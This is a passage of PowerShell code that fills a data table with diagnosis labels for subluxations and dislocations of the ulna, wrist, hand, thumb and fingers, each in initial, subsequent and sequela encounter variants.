$DiagnosisList.Rows.Add("Subluxation of distal end of unspecified ulna","Subluxation of distal end of unspecified ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of unspecified ulna","Subluxation of distal end of unspecified ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of unspecified ulna","Subluxation of distal end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of right ulna","Dislocation of distal end of right ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of right ulna","Dislocation of distal end of right ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of right ulna","Dislocation of distal end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of left ulna","Dislocation of distal end of left ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of left ulna","Dislocation of distal end of left ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of left ulna","Dislocation of distal end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of unspecified ulna","Dislocation of distal end of unspecified ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of unspecified ulna","Dislocation of distal end of unspecified ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal end of unspecified ulna","Dislocation of distal end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right wrist and hand","Other subluxation of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right wrist and hand","Other subluxation of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right wrist and hand","Other subluxation of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left wrist and hand","Other subluxation of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left wrist and hand","Other subluxation of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left wrist and hand","Other subluxation of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified wrist and hand","Other subluxation of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified wrist and hand","Other subluxation of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified wrist and hand","Other subluxation of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right wrist and hand","Other dislocation of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right wrist and hand","Other dislocation of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right wrist and hand","Other dislocation of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left wrist and hand","Other dislocation of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left wrist and hand","Other dislocation of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left wrist and hand","Other dislocation of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified wrist and hand","Other dislocation of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified wrist and hand","Other dislocation of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified wrist and hand","Other dislocation of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right thumb","Unspecified subluxation of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right thumb","Unspecified subluxation of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right thumb","Unspecified subluxation of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left thumb","Unspecified subluxation of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left thumb","Unspecified subluxation of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left thumb","Unspecified subluxation of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified thumb","Unspecified subluxation of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified thumb","Unspecified subluxation of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified thumb","Unspecified subluxation of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right thumb","Unspecified dislocation of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right thumb","Unspecified dislocation of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right thumb","Unspecified dislocation of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left thumb","Unspecified dislocation of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left thumb","Unspecified dislocation of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left thumb","Unspecified dislocation of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified thumb","Unspecified dislocation of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified thumb","Unspecified dislocation of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified thumb","Unspecified dislocation of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right thumb","Subluxation of metacarpophalangeal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right thumb","Subluxation of metacarpophalangeal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right thumb","Subluxation of metacarpophalangeal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left thumb","Subluxation of metacarpophalangeal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left thumb","Subluxation of metacarpophalangeal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left thumb","Subluxation of metacarpophalangeal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of unspecified thumb","Subluxation of metacarpophalangeal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of unspecified thumb","Subluxation of metacarpophalangeal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of unspecified thumb","Subluxation of metacarpophalangeal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right thumb","Dislocation of metacarpophalangeal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right thumb","Dislocation of metacarpophalangeal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right thumb","Dislocation of metacarpophalangeal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left thumb","Dislocation of metacarpophalangeal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left thumb","Dislocation of metacarpophalangeal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left thumb","Dislocation of metacarpophalangeal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of unspecified thumb","Dislocation of metacarpophalangeal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of unspecified thumb","Dislocation of metacarpophalangeal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of unspecified thumb","Dislocation of metacarpophalangeal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right thumb","Subluxation of interphalangeal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right thumb","Subluxation of interphalangeal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right thumb","Subluxation of interphalangeal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left thumb","Subluxation of interphalangeal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left thumb","Subluxation of interphalangeal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left thumb","Subluxation of interphalangeal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified thumb","Subluxation of interphalangeal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified thumb","Subluxation of interphalangeal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified thumb","Subluxation of interphalangeal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right thumb","Dislocation of interphalangeal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right thumb","Dislocation of interphalangeal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right thumb","Dislocation of interphalangeal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left thumb","Dislocation of interphalangeal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left thumb","Dislocation of interphalangeal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left thumb","Dislocation of interphalangeal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified thumb","Dislocation of interphalangeal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified thumb","Dislocation of interphalangeal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified thumb","Dislocation of interphalangeal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right index finger","Unspecified subluxation of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right index finger","Unspecified subluxation of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right index finger","Unspecified subluxation of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left index finger","Unspecified subluxation of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left index finger","Unspecified subluxation of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left index finger","Unspecified subluxation of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right middle finger","Unspecified subluxation of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right middle finger","Unspecified subluxation of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right middle finger","Unspecified subluxation of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left middle finger","Unspecified subluxation of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left middle finger","Unspecified subluxation of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left middle finger","Unspecified subluxation of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right ring finger","Unspecified subluxation of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right ring finger","Unspecified subluxation of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right ring finger","Unspecified subluxation of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left ring finger","Unspecified subluxation of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left ring finger","Unspecified subluxation of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left ring finger","Unspecified subluxation of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right little finger","Unspecified subluxation of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right little finger","Unspecified subluxation of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right little finger","Unspecified subluxation of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left little finger","Unspecified subluxation of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left little finger","Unspecified subluxation of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left little finger","Unspecified subluxation of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of other finger","Unspecified subluxation of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of other finger","Unspecified subluxation of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of other finger","Unspecified subluxation of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified finger","Unspecified subluxation of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified finger","Unspecified subluxation of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified finger","Unspecified subluxation of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right index finger","Subluxation of metacarpophalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right index finger","Subluxation of metacarpophalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right index finger","Subluxation of metacarpophalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left index finger","Subluxation of metacarpophalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left index finger","Subluxation of metacarpophalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left index finger","Subluxation of metacarpophalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right middle finger","Subluxation of metacarpophalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right middle finger","Subluxation of metacarpophalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right middle finger","Subluxation of metacarpophalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left middle finger","Subluxation of metacarpophalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left middle finger","Subluxation of metacarpophalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left middle finger","Subluxation of metacarpophalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right ring finger","Subluxation of metacarpophalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right ring finger","Subluxation of metacarpophalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right ring finger","Subluxation of metacarpophalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left ring finger","Subluxation of metacarpophalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left ring finger","Subluxation of metacarpophalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left ring finger","Subluxation of metacarpophalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right little finger","Subluxation of metacarpophalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right little finger","Subluxation of metacarpophalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of right little finger","Subluxation of metacarpophalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left little finger","Subluxation of metacarpophalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left little finger","Subluxation of metacarpophalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of left little finger","Subluxation of metacarpophalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of other finger","Subluxation of metacarpophalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of other finger","Subluxation of metacarpophalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of other finger","Subluxation of metacarpophalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of unspecified finger","Subluxation of metacarpophalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of unspecified finger","Subluxation of metacarpophalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpophalangeal joint of unspecified finger","Subluxation of metacarpophalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right index finger","Subluxation of unspecified interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right index finger","Subluxation of unspecified interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right index finger","Subluxation of unspecified interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left index finger","Subluxation of unspecified interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left index finger","Subluxation of unspecified interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left index finger","Subluxation of unspecified interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right middle finger","Subluxation of unspecified interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right middle finger","Subluxation of unspecified interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right middle finger","Subluxation of unspecified interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left middle finger","Subluxation of unspecified interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left middle finger","Subluxation of unspecified interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left middle finger","Subluxation of unspecified interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right ring finger","Subluxation of unspecified interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right ring finger","Subluxation of unspecified interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right ring finger","Subluxation of unspecified interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left ring finger","Subluxation of unspecified interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left ring finger","Subluxation of unspecified interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left ring finger","Subluxation of unspecified interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right little finger","Subluxation of unspecified interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right little finger","Subluxation of unspecified interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of right little finger","Subluxation of unspecified interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left little finger","Subluxation of unspecified interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left little finger","Subluxation of unspecified interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of left little finger","Subluxation of unspecified interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of other finger","Subluxation of unspecified interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of other finger","Subluxation of unspecified interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of other finger","Subluxation of unspecified interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of unspecified finger","Subluxation of unspecified interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of unspecified finger","Subluxation of unspecified interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified interphalangeal joint of unspecified finger","Subluxation of unspecified interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right index finger","Subluxation of proximal interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right index finger","Subluxation of proximal interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right index finger","Subluxation of proximal interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left index finger","Subluxation of proximal interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left index finger","Subluxation of proximal interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left index finger","Subluxation of proximal interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right middle finger","Subluxation of proximal interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right middle finger","Subluxation of proximal interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right middle finger","Subluxation of proximal interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left middle finger","Subluxation of proximal interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left middle finger","Subluxation of proximal interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left middle finger","Subluxation of proximal interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right ring finger","Subluxation of proximal interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right ring finger","Subluxation of proximal interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right ring finger","Subluxation of proximal interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left ring finger","Subluxation of proximal interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left ring finger","Subluxation of proximal interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left ring finger","Subluxation of proximal interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right little finger","Subluxation of proximal interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right little finger","Subluxation of proximal interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of right little finger","Subluxation of proximal interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left little finger","Subluxation of proximal interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left little finger","Subluxation of proximal interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of left little finger","Subluxation of proximal interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of other finger","Subluxation of proximal interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of other finger","Subluxation of proximal interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of other finger","Subluxation of proximal interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of unspecified finger","Subluxation of proximal interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of unspecified finger","Subluxation of proximal interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of proximal interphalangeal joint of unspecified finger","Subluxation of proximal interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right index finger","Subluxation of distal interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right index finger","Subluxation of distal interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right index finger","Subluxation of distal interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left index finger","Subluxation of distal interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left index finger","Subluxation of distal interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left index finger","Subluxation of distal interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right middle finger","Subluxation of distal interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right middle finger","Subluxation of distal interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right middle finger","Subluxation of distal interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left middle finger","Subluxation of distal interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left middle finger","Subluxation of distal interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left middle finger","Subluxation of distal interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right ring finger","Subluxation of distal interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right ring finger","Subluxation of distal interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right ring finger","Subluxation of distal interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left ring finger","Subluxation of distal interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left ring finger","Subluxation of distal interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left ring finger","Subluxation of distal interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of 